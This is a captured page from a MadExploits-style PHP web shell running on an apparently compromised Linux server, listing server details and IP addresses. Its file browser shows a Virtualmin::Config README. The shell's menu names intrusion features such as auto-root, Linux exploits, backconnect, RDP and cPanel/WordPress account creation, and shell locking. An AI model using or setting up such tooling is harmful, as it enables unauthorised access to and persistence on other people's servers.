Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
virtualmin-config /
[ HOME SHELL ]
Name
Size
Permission
Action
LICENSE
35.6
KB
-rw-r--r--
META.json
16.13
KB
-rw-r--r--
README
3.2
KB
-rw-r--r--
dist.ini
658
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README
NAME Virtualmin::Config - A collection of plugins to initialize the configuration of services that Virtualmin manages, and a command line tool called config-system to run them. It can be thought of as a very specialized configuration management system (e.g. puppet, chef, whatever) for doing just one thing (setting up a system for Virtualmin). It has basic dependency resolution (via topological sort), logging, and ties into the Webmin API to make some common tasks (like starting/stopping services, setting them to run on boot) simpler to code. SYNOPSIS my $bundle = Virtualmin::Config->new(bundle => 'LAMP'); $bundle->run(); You can also call it with specific plugins, rather than a whole bundle of plugins. my $plugin = Virtualmin::Config->new(include => 'Apache'); $plugin->run(); Adding new features to the installer, or modifying installer features, should be done by creating new plugins or by adding to existing ones. DESCRIPTION This is a mini-framework for configuring elements of a Virtualmin system. It uses Webmin as a library to abstract common configuration tasks, provides a friendly status indicator, and makes it easy to pick and choose the kind of configuration you want (should you choose to go that route). The Virtualmin install script chooses either the LAMP (with Apache) or LEMP (with nginx) bundle, and performs the configuration for the whole stack. It includes plugins for all of the common tasks in a Virtualmin system, such as Apache, MySQL/MariaDB, Postfix, SpamAssassin, etc. INSTALLATION The recommended installation method is to use native packages for your distribution. We provide packages for Debian, Ubuntu, CentOS/RHEL, and Fedora in our repositories. You can use the standard Perl process to install from the source tarball or git clone: perl Makefile.PL make make test make install Or, use your system native package manager. The followin assumes you have all of the packages needed to build native packages installed. To build a dpkg for Debian/Ubuntu: dpkg-buildpackage -b -rfakeroot -us -uc And, for CentOS/Fedora/RHEL/etc. RPM distributions: dzil build # Creates a tarball cp Virtualmin-Config-*.tar.gz ~/rpmbuild/SOURCES rpmbuild -bb virtualmin-config.spec ATTRIBUTES bundle Selects the plugin bundle to be installed. A bundle is a list of plugins configured in a "Virtualmin::Config::*" class. include One or more additional plugins to include in the "run()". This can be used alongside "bundle" or by itself. Dependencies will also be run, and there is no way to disable dependencies (because they're depended on!). exclude One or more plugins to remove from the selected "bundle". Plugins that are needed to resolve dependencies will be re-added automatically. METHODS run This method figures out which plugins to run (based on the "bundle", "include", and "exclude" attributes. LICENSE AND COPYRIGHT Licensed under the GPLv3. Copyright 2017 Virtualmin, Inc. <joe@virtualmin.com>
Close